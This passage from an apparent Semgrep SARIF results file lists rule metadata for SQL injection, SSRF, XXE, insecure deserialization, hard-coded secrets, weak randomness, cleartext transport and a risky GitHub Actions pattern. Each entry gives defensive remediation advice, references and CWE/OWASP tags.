injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"helpUri":"https://semgrep.dev/r/go.net.sql.pg-sqli-taint.pg-sqli-taint","id":"go.net.sql.pg-sqli-taint.pg-sqli-taint","name":"go.net.sql.pg-sqli-taint.pg-sqli-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.net.sql.pg-sqli-taint.pg-sqli-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead."},"help":{"markdown":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.weak-random.weak-random)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.weak-random.weak-random","id":"java.lang.security.audit.crypto.weak-random.weak-random","name":"java.lang.security.audit.crypto.weak-random.weak-random","properties":{"precision":"very-high","tags":["CWE-330: Use of Insufficiently Random Values","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.weak-random.weak-random"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.http-request.http-request)\n - [https://golang.org/pkg/net/http/#Get](https://golang.org/pkg/net/http/#Get)\n","text":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","id":"problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","name":"problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.http-request.http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","id":"csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","name":"csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","id":"javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","name":"javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","id":"java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","name":"java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false."},"help":{"markdown":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry-The-New-Age-Of-XXE-java-wp.pdf](https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry-The-New-Age-Of-XXE-java-wp.pdf)\n","text":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","id":"java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","name":"java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","id":"ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","name":"ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations."},"help":{"markdown":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout)\n - [https://securitylab.github.com/research/github-actions-preventing-pwn-requests/](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)\n - [https://github.com/justinsteven/advisories/blob/master/2021_github_actions_checkspelling_token_leak_via_advice_symlink.md](https://github.com/justinsteven/advisories/blob/master/2021_github_actions_checkspelling_token_leak_via_advice_symlink.md)\n - [https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)\n","text":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations."},"helpUri":"https://semgrep.dev/r/yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","id":"yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","name":"yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","properties":{"precision":"very-high","tags":["CWE-913: Improper Control of Dynamically-Managed Code Resources","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"helpUri":"https://semgrep.dev/r/kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","id":"kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","name":"kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice."},"help":{"markdown":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.cookie-serialization.cookie-serialization)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_cookie_serialization.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_cookie_serialization.rb)\n - [https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/](https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/)\n","text":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.cookie-serialization.cookie-serialization","id":"ruby.lang.security.cookie-serialization.cookie-serialization","name":"ruby.lang.security.cookie-serialization.cookie-serialization","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.cookie-serialization.cookie-serialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","id":"python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","name":"python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","id":"python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","name":"python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-dill-flask.tainted-dill-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","id":"python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","name":"python.flask.deserialization.tainted-dill-flask.tainted-dill-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-dill-flask.tainted-dill-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","id":"python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","name":"python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an unsecured transmission channel. 'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports 